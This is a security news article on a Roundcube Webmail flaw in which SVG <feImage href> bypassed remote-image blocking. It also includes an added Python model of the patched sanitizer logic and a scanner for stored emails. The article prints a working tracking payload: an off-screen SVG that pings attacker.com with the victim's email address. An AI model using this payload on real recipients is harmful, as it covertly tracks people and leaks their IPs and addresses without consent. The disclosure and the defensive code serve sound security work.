Source: Cyber Press
https://cyberpress.org/roundcube-webmail-vulnerability-lets-attackers-track-email-opens/

In a sneaky bypass of email security features, a vulnerability in Roundcube Webmail exposes users to hidden tracking even when "Block remote images" is enabled.
Discovered during holiday tinkering, this issue (CVE-2026-25916) affects versions before 1.5.13 and 1.6.13. Attackers can confirm whether you have opened their emails, logging your IP address and browser details without your knowledge.
The Problem in Plain Terms

Roundcube's HTML sanitizer is like a bouncer at a club. It blocks external images in the usual spots: <img src>, <image href>, and <use href>.
These checks go through a function called is_image_attribute(), which rejects remote URLs when remote image loading is turned off.
But the SVG element <feImage> slipped through. Its href attribute, which pulls an image into an SVG filter, was not on that list, so the sanitizer treated it as an ordinary link instead.
That link path, wash_link(), allows HTTP/HTTPS URLs. Result? The browser fetches the attacker's image invisibly, bypassing the block.
Security researcher “nullcathedral” spotted this while auditing recent SVG fixes in Roundcube’s rcube_washtml.php.
One SVG bug often hints at more, and <feImage> stood out because it renders like an <img> but dodges the image checks.
How Attackers Exploit It

Imagine receiving this malicious HTML in an email:

```html
<svg width="1" height="1" style="position:absolute;left:-9999px;">
<defs>
<filter id="t">
<feImage href="https://attacker.com/track?email=victim@test.com" width="1" height="1"/>
</filter>
</defs>
<rect filter="url(#t)" width="1" height="1"/>
</svg>
```

It's a tiny, off-screen SVG. When rendered, the browser loads the href image, pinging the attacker's server.
No click is required; opening the email is enough. That makes it well suited to phishing campaigns and spam tracking.
CVE Details

CVE: CVE-2026-25916
Vendor: Roundcube
Product: Roundcube Webmail
Affected Versions: < 1.5.13, < 1.6.13
Disclosure Date: 2026-02-08
Developers patched it. The update extends is_image_attribute() so that an href attribute is treated as an image attribute whenever the tag name matches a regex: ($attr == 'href' && preg_match('/^(feimage|image|use)$/i', $tag)). Now <feImage href> goes through the same remote-image check as <image href> and <use href> and is blocked when "Block remote images" is on. Administrators should upgrade to 1.5.13 or 1.6.13 (or later); the setting alone does not protect older versions.
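To make the routing described above concrete (an href that is not an "image attribute" falls through to the link path, which permits http/https), here is an added example in Python. It is not Roundcube's PHP and not the researcher's code: it is a simplified model of the before/after logic of is_image_attribute() with the patch regex ported to Python's re, plus a small scanner that reports which remote loads would survive washing. The helper names, the treatment of mailto: in the link path, and the sample email are constructed for illustration.

```python
# Added example: a Python model of the attribute routing in rcube_washtml.php
# described in the article. Not Roundcube's code; names and sample are constructed.
import re
from html.parser import HTMLParser

REMOTE_URL = re.compile(r'^\s*https?://', re.I)

# Tag/attribute pairs that make a browser fetch a resource when the HTML is rendered.
FETCHING_PAIRS = {('img', 'src'), ('image', 'href'), ('use', 'href'), ('feimage', 'href')}


def is_image_attribute_before(tag, attr):
    """Pre-fix logic: <feImage href> is not on the list, so it is routed as a link."""
    tag, attr = tag.lower(), attr.lower()
    return (tag == 'img' and attr == 'src') or (attr == 'href' and tag in ('image', 'use'))


# The regex quoted in the article, ported from preg_match() to Python's re.
FIXED_HREF_TAGS = re.compile(r'^(feimage|image|use)$', re.I)


def is_image_attribute_after(tag, attr):
    """Post-fix logic: feimage is now one of the tags whose href counts as an image."""
    tag, attr = tag.lower(), attr.lower()
    return (tag == 'img' and attr == 'src') or (attr == 'href' and FIXED_HREF_TAGS.match(tag) is not None)


def wash_attribute(tag, attr, value, is_image_attribute, block_remote=True):
    """Return the value the sanitizer would keep, or None if the attribute is dropped.

    Simplified model: image attributes lose remote URLs when "Block remote images"
    is on; any other href goes through a link path that keeps http/https URLs
    (and, as an assumption for this model, mailto: links).
    """
    if is_image_attribute(tag, attr):
        if block_remote and REMOTE_URL.match(value):
            return None
        return value
    if attr.lower() == 'href':
        if REMOTE_URL.match(value) or value.lower().startswith('mailto:'):
            return value
        return None
    return value


class RemoteFetchFinder(HTMLParser):
    """Collect (tag, attr, url) triples that survive washing and would trigger a fetch."""

    def __init__(self, is_image_attribute):
        super().__init__()
        self.is_image_attribute = is_image_attribute
        self.fetches = []

    def handle_starttag(self, tag, attrs):
        # html.parser lowercases names, so <feImage href=...> arrives as ('feimage', 'href').
        for attr, value in attrs:
            if value is None:
                continue
            washed = wash_attribute(tag, attr, value, self.is_image_attribute)
            if washed is not None and (tag, attr) in FETCHING_PAIRS and REMOTE_URL.match(washed):
                self.fetches.append((tag, attr, washed))


def remote_fetches(html, fixed):
    """Which remote loads would a washed copy of `html` still cause? Empty list means none."""
    finder = RemoteFetchFinder(is_image_attribute_after if fixed else is_image_attribute_before)
    finder.feed(html)
    finder.close()
    return finder.fetches


# Constructed sample: the article's tracking SVG plus an ordinary remote <img> and a
# plain link, to show that only the feImage path slips through the pre-fix logic.
SAMPLE_EMAIL = """
<p>Hello <a href="https://attacker.com/landing">click here</a></p>
<img src="https://attacker.com/pixel.gif" width="1" height="1">
<svg width="1" height="1" style="position:absolute;left:-9999px;">
  <defs><filter id="t">
    <feImage href="https://attacker.com/track?email=victim@test.com" width="1" height="1"/>
  </filter></defs>
  <rect filter="url(#t)" width="1" height="1"/>
</svg>
"""

if __name__ == '__main__':
    print('before fix:', remote_fetches(SAMPLE_EMAIL, fixed=False))
    print('after fix: ', remote_fetches(SAMPLE_EMAIL, fixed=True))
```

Run as a script, the pre-fix model reports one surviving remote load (the feImage href) while the <img src> is blocked and the <a href> is kept but is not a fetch; the post-fix model reports none. The same scanner can be pointed at stored message bodies to find emails that relied on this path before the upgrade.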
2026-01-04: Reported to Roundcube.
2026-02-08: Versions 1.5.13 and 1.6.13 released.
2026-02-09: CVE assigned.